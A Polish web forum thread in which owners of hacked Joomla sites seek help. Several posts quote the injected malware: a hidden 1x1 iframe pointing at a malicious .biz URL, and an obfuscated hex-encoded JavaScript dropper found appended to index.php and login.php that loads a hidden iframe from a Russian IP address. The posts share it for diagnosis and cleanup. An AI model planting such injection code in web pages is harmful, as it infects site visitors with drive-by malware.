Prośba o pomoc-portal w Joomla zaatakowany

[pok]

Witam,

mam do Was wielką prośbę. Otóż wczoraj ktoś podpiął nam pod strone "konia trojańskiego" w taki sposób, że jeżeli ktoś wchodzi na strone przez Explorera to wyskakuje mu okienko monitu skryptu i informacja o tym że wykryto konia trojańskiego.Pod Firefoxem wszystko chodzi ok ponieważ jakoś sobie radzi z tym. Podobno ktoś mógł dostać się przez jakąś dziurę w Joomli lub forum. Jeżeli ktoś wie o co chodzi lub mógłby mi jakoś pomóc będę bardzo wdzięczny. Pozdrawiam Adres strony zainfekowanej to www.miastostudentow.pl Mozecie sprawdzić pod Explorerem i Firefoxem

[josh]

a na kotrej to wersji joomla/ mambo dziala twoj serwis??


widze pod IE Exploit.WMF trojan

pozdr

[pok]

dokladnie coś takiego:
Joomla! 1.0.7 Stable [ Sunburst ] 15-Jan-2006 20:00 UTC

[pok]

i jeszcze jedno...moze to bedzie smieszne teraz co napisze, ale jeżeli wejdziesz na strone przez Firefoxa i klkniesz powiedzmy w ikonke działu "Gdzie zjeść" i później pokaże Ci się menu po lewej stronie "Rozrywka" to zaraz pod tym nagłówkiem bedziesz miał taki mały kwadracik (u mnie jest czarny) i jak dasz na niego źródło to bedzie to wygladalo tak iframe src="http://zchxsikpgz.biz/dl/adv521.php" height="1" width="1"></iframe
i to jest właśnie chyba ten syf.
Pozdrawiam i dzieki za tak szybka odpowiedz

[Dylek]

To nie jest smieszne, co napisales, bo definiuje to rozmiar 1x1 px
Jeden z odwiedzajacych nasz serwis znalazl zlosliwy kod w pliku mod_mainmenu.php

[pok]

a mógłbym prosić o dokładniejszą podpowiedź jak to usunąć i co to za kod. dzwoniłem do home.pl bo tam znajduje się nasz serwis i oni nie wiedzą jak pomóż, ale powiedzieli mi że to najprawdopodobniej przez forum phpbb2 bylo wejście.

[CNK]

a ja mam taki problem, a dokładnie z jakiegoś rosyjskiego adresu IP: 77.221.133.188. Kasperski wyświetla komunikat:

Koń trojański:
Trojan-Clicker.HTML.IFrame.fp


Plik: http://77.221.133.188/.if/go.html?1495741d86a30891

gdy szukam tego adresu w bazie czy w plikach strony to nic nie ma, nadpisanie plików pomaga na jakiś czas a kilka godzin później znów to samo.. :/

znalazłem coś o tym tu: http://forum.joomla.org/index.php?to...119.msg1107618
lecz tam tylko doradzili instalacje wszystkiego od nowa..

[joombo]

Po pierwsze poszukaj w bazie nie adresu strony, ale kodu: iframe. Drugie, to poda j wersję joomli i liste komponentów. Do minie ten śmieć dostał sie prawdopodobnie przez ruski komponent classifields. Ten komponent ogłoszeń ma* dziurę taką, że da się załadować nie tylko obrazek, ale i skrypt, a potem może sobie to ktoś elegancko i zdalnie uruchomić. Na tę dziurę była jakas łatka (sprawdzająca, czy plik wczytywany jest w formacie grafiki), ale to była łatka nieoficjalna.

*wersja 1.4, przynajniej do niedawna ostatnia i nie rozwijana

[CNK]

wersja joomli 1.0.13 (wcześniej nic takiego nie miałem)
lista komponentów:
1) ARTIO JoomSEF
2) Banners (domyślnie jest w joomli)
3) Joomla-Przemo 1.2
4) Komentarze :: AkoComment 1.4.6
5) Mass Mail (domyślnie)
6) News Feeds (domyślnie w każdej Joomli)
7) Polls (j.w.)
8) Syndicate (j.w)
9) Web Links (j.w.)

To tyle z komponentów.

"iframe" w bazie Joomli też nie ma

Edit:
dodam jeszcze, że wcześniej nie miałem artio sef, ani akocomments tweaked.. jakieś 2 dni temu, i tak samo wyskakiwał komunikat z trojanem..

w pliku index.php i login.php dodaje się na końcu kod:

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4763452669b07(v4763452669eed){ return(parseInt(v4763452669eed,16));}function v476345266aab8(v476345266aeb6){ var v476345266b28e='';for(v476345266b686=0; v476345266b686<v476345266aeb6.length; v476345266b686+=2){ v476345266b28e+=(String.fromCharCode(v4763452669b0 7(v476345266aeb6.substr(v476345266b686, 2))));}return v476345266b28e;} document.write(v476345266aab8('3C5343524950543E776 96E646F772E7374617475733D27446F6E65273B646F63756D6 56E742E777269746528273C696672616D65206E616D653D632 07372633D5C27687474703A2F2F37372E3232312E3133332E3 138382F2E69662F676F2E68746D6C3F272B4D6174682E726F7 56E64284D6174682E72616E646F6D28292A313836303832292 B273139653466353236613938655C272077696474683D34343 2206865696768743D343231207374796C653D5C27646973706 C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5 343524950543E'));</script>

ale jak to nie mam zielonego pojęcia z czego wywala ten kod..

ale nawet jak usunę ten kod z tych 2 plików, to kasperski dalej informuje o trojanie na stronie.. czyli jest to jeszcze gdzieś..

[joombo]

A wszystko w porządku z uprawnieniami do katalogów/plików i htaccess? Do tego - jest metoda na zablokowanie wybranego ip z uzyciem htaccess - poszperaj na forum, a znajdziesz.